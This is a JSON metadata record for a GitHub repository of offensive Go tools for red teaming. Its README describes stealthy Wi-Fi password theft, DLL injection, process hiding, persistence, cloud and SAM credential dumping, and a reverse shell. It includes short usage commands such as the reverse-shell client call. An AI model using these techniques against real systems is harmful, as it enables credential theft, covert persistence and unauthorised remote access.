{
  "id": 26140463,
  "url": "https://github.com/stavinski/malgo",
  "last_synced_at": "2025-03-11T02:53:47.048Z",
  "repository": {
    "id": 65239759,
    "uuid": "581136075",
    "full_name": "stavinski/malgo",
    "owner": "stavinski",
    "description": "Malicious Go code for red teaming/pentesting",
    "archived": false,
    "fork": false,
    "pushed_at": "2023-09-25T13:21:43.000Z",
    "size": 2551,
    "stargazers_count": 1,
    "open_issues_count": 0,
    "forks_count": 1,
    "subscribers_count": 1,
    "default_branch": "main",
    "last_synced_at": "2024-06-21T10:59:20.238Z",
    "etag": null,
    "topics": ["cybersecurity", "golang", "maliciouscode", "offensive-security", "redteam-tools", "redteaming"],
    "latest_commit_sha": null,
    "homepage": "",
    "language": "Go",
    "has_issues": false,
    "has_wiki": null,
    "has_pages": null,
    "mirror_url": null,
    "source_name": null,
    "license": null,
    "status": null,
    "scm": "git",
    "pull_requests_enabled": true,
    "icon_url": "https://github.com/stavinski.png",
    "metadata": {
      "files": {
        "readme": "README.md",
        "changelog": null,
        "contributing": null,
        "funding": null,
        "license": null,
        "code_of_conduct": null,
        "threat_model": null,
        "audit": null,
        "citation": null,
        "codeowners": null,
        "security": null,
        "support": null,
        "governance": null,
        "roadmap": null,
        "authors": null,
        "dei": null,
        "publiccode": null,
        "codemeta": null
      }
    },
    "created_at": "2022-12-22T11:17:37.000Z",
    "updated_at": "2024-03-22T10:29:19.000Z",
    "dependencies_parsed_at": "2024-06-21T10:09:16.962Z",
    "dependency_job_id": null,
    "html_url": "https://github.com/stavinski/malgo",
    "commit_stats": {
      "total_commits": 28,
      "total_committers": 1,
      "mean_commits": 28.0,
      "dds": 0.0,
      "last_synced_commit": "fddd950efffc9e27ea2350ba92924f7b36f19d2f"
    },
    "previous_names": [],
    "tags_count": 0,
    "template": false,
    "template_full_name": null,
    "repository_url": "https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/stavinski%2Fmalgo",
    "tags_url": "https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/stavinski%2Fmalgo/tags",
    "releases_url": "https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/stavinski%2Fmalgo/releases",
    "manifests_url": "https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/stavinski%2Fmalgo/manifests",
    "owner_url": "https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/stavinski",
    "download_url": "https://codeload.github.com/stavinski/malgo/tar.gz/refs/heads/main",
    "host": {
      "name": "GitHub",
      "url": "https://github.com",
      "kind": "github",
      "repositories_count": 242961740,
      "owners_count": 20213316,
      "icon_url": "https://github.com/github.png",
      "version": null,
      "created_at": "2022-05-30T11:31:42.601Z",
      "updated_at": "2022-07-04T15:15:14.044Z",
      "host_url": "https://repos.ecosyste.ms/api/v1/hosts/GitHub",
      "repositories_url": "https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories",
      "repository_names_url": "https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names",
      "owners_url": "https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"
    }
  },
  "keywords": ["cybersecurity", "golang", "maliciouscode", "offensive-security", "redteam-tools", "redteaming"],
  "created_at": "2025-03-11T02:53:46.401Z",
  "updated_at": "2025-03-11T02:53:47.035Z",
  "avatar_url": "https://github.com/stavinski.png",
  "language": "Go",
  "funding_links": [],
  "categories": [],
  "sub_categories": [],
  "readme": "# Mal(icious)Go\n\n## Disclaimer\n\nShould only be used for systems that you have explicit permission to target; I take no responsibility for actions performed using any code from this repository.\n\nUse at your own risk!\n\n## wifi pwds\n\nRetrieve WLAN passwords from Windows. Uses native calls in the Win32 API rather than executing `netsh wlan ...` as a command; this approach is more stealthy!\n\n## inject\n\nInjects a DLL into a remote process using the classic on-disk / `LoadLibrary` approach, so it should be used primarily for testing as it is not opsec safe.\n\nUsage:\n\n~~~\ninject_x64.exe \u003cdll_path\u003e \u003cpid\u003e\n~~~\n\n## rshell\n\nSimple reverse shell implementation; the client supports comms over TLS using the `tlsserver.go` server code.\n\n### client\n\n_Certificate is embedded into the compiled binary; update to a newly created cert._\n\n~~~\nclient -tls -port 4444 \u003chost\u003e\n~~~\n\n### server\n\n~~~\ntlsserver -port 4444 \u003ccert\u003e \u003ckey\u003e\n~~~\n\n## proxy\n\nSimple TCP proxy.\n\n~~~\nproxy \u003cport\u003e \u003chost:port\u003e\n~~~\n\n## persistence\n\nA PoC to test adding a scheduled task into Windows via COM/OLE rather than the noisy approach of using `schtasks.exe`. Please adjust to your needs!\n\n## hideproc\n\nUses IAT hooking to hook into the low-level `NtQuerySystemInformation` function import from `ntdll.dll` and hide processes based on an image name. Also includes a test executable to test against. Simply inject the DLL into the process you want to hide processes from.\n\nAlso demonstrates being able to read the PE, including the IAT entries, in memory.\n\nCode could be adjusted to perform other tasks.\n\n## imdsdump\n\nFind yourself on an EC2 instance with an assigned role?! This will use the IMDS to retrieve the temporary creds. Useful if the EC2 host is locked down, making it tricky to call the service using other methods; it also supports working against IMDSv2, which requires a token.\n\nCompiles to an exe; however, the code could be changed and compiled as a DLL to be used in memory to be more stealthy or when app blocking is in place.\n\n## samdump\n\nDumps the SAM \u0026 SYSTEM registry hives using Win32 API calls to allow offline cracking of the password hashes. More stealthy than using the reg commands or a well-known program.\n\nUsage:\n\n~~~\nsamdump_x64.exe \u003cdir\u003e\n~~~\n",
  "project_url": "https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fstavinski%2Fmalgo",
  "html_url": "https://awesome.ecosyste.ms/projects/github.com%2Fstavinski%2Fmalgo",
  "lists_url": "https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fstavinski%2Fmalgo/lists"
}